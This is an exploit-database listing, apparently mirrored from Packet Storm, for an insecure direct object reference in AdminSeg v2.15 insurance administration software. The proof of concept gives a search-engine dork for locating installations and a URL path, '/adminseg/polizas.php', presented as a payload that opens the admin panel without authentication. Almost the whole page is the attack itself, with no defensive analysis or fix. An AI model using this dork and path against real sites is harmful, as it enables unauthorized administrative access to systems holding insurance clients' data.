Exploit for AdminSeg 2.15 Insecure Direct Object Reference

Name: Exploit for AdminSeg 2.15 Insecure Direct Object Reference
Rating: 5 (124 reviews)

2023-01-10 | CVSS -0.6

## https://sploitus.com/exploit?id=PACKETSTORM:170405
====================================================================================================================================  
| # Title : AdminSeg v2.15 Unauthorized administrative access Vulnerability |  
| # Author : indoushka |  
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 108.0.1(64-bit) |   
| # Vendor : https://www.arwebs.net/producto/insurance-administration-software.html |   
| # Dork : AdminSeg v2.15 |  
====================================================================================================================================  
  
poc :  
  
  
[+] Dorking İn Google Or Other Search Enggine.  
  
[+] by using this payload you can access directly at admin panel .  
  
[+] payload : /adminseg/polizas.php  
  
[+] https://www.127.0.0.1/v2.15/adminseg/polizas.php  
  
Greetings to :=========================================================================================================================  
|  
jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* moncet |   
|  
=======================================================================================================================================